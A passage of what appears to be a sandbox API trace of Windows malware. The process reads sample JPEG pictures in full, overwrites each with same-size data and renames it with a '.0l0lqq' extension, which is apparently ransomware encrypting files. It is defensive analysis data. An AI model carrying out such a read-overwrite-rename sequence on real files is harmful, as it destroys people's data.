[0247.068] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.068] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x73903a0 | out: lpFileInformation=0x73903a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.068] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.069] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x739048c | out: lpFileInformation=0x739048c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.070] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.071] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0247.071] GetFileType (hFile=0x558) returned 0x1 [0247.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.071] GetFileType (hFile=0x558) returned 0x1 [0247.071] GetFileSize (in: hFile=0x558, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0x91554 [0247.071] ReadFile (in: hFile=0x558, lpBuffer=0x3276150, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesRead=0x26dd2c*=0x91554, lpOverlapped=0x0) returned 1 [0247.081] CloseHandle (hObject=0x558) returned 1 [0247.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.125] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0247.132] GetFileType (hFile=0x558) returned 0x1 [0247.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.132] GetFileType (hFile=0x558) returned 0x1 [0247.132] WriteFile (in: hFile=0x558, lpBuffer=0x354cc20*, nNumberOfBytesToWrite=0x91554, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x354cc20*, lpNumberOfBytesWritten=0x26dd1c*=0x91554, lpOverlapped=0x0) returned 1 [0247.145] CloseHandle (hObject=0x558) returned 1 [0247.152] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.0l0lqq", lpFilePart=0x0) returned 0x3e [0247.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6460b1d0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.153] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.0l0lqq")) returned 1 [0247.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.161] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6c89fe0 | out: lpFileInformation=0x6c89fe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.163] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.163] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.163] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6c8d220 | out: lpFileInformation=0x6c8d220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.165] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.165] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6c8d308 | out: lpFileInformation=0x6c8d308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.166] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.166] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0247.167] GetFileType (hFile=0x558) returned 0x1 [0247.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.167] GetFileType (hFile=0x558) returned 0x1 [0247.167] GetFileSize (in: hFile=0x558, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0xbd616 [0247.175] ReadFile (in: hFile=0x558, lpBuffer=0x3276150, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesRead=0x26dd2c*=0xbd616, lpOverlapped=0x0) returned 1 [0247.187] CloseHandle (hObject=0x558) returned 1 [0247.249] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.249] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0247.259] GetFileType (hFile=0x558) returned 0x1 [0247.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.259] GetFileType (hFile=0x558) returned 0x1 [0247.259] WriteFile (in: hFile=0x558, lpBuffer=0x3276150*, nNumberOfBytesToWrite=0xbd616, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesWritten=0x26dd1c*=0xbd616, lpOverlapped=0x0) returned 1 [0247.276] CloseHandle (hObject=0x558) returned 1 [0247.285] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0247.285] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.0l0lqq", lpFilePart=0x0) returned 0x3d [0247.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.285] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6473bcd0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0247.285] SetThreadErrorMode (dwNewMode=0x0, 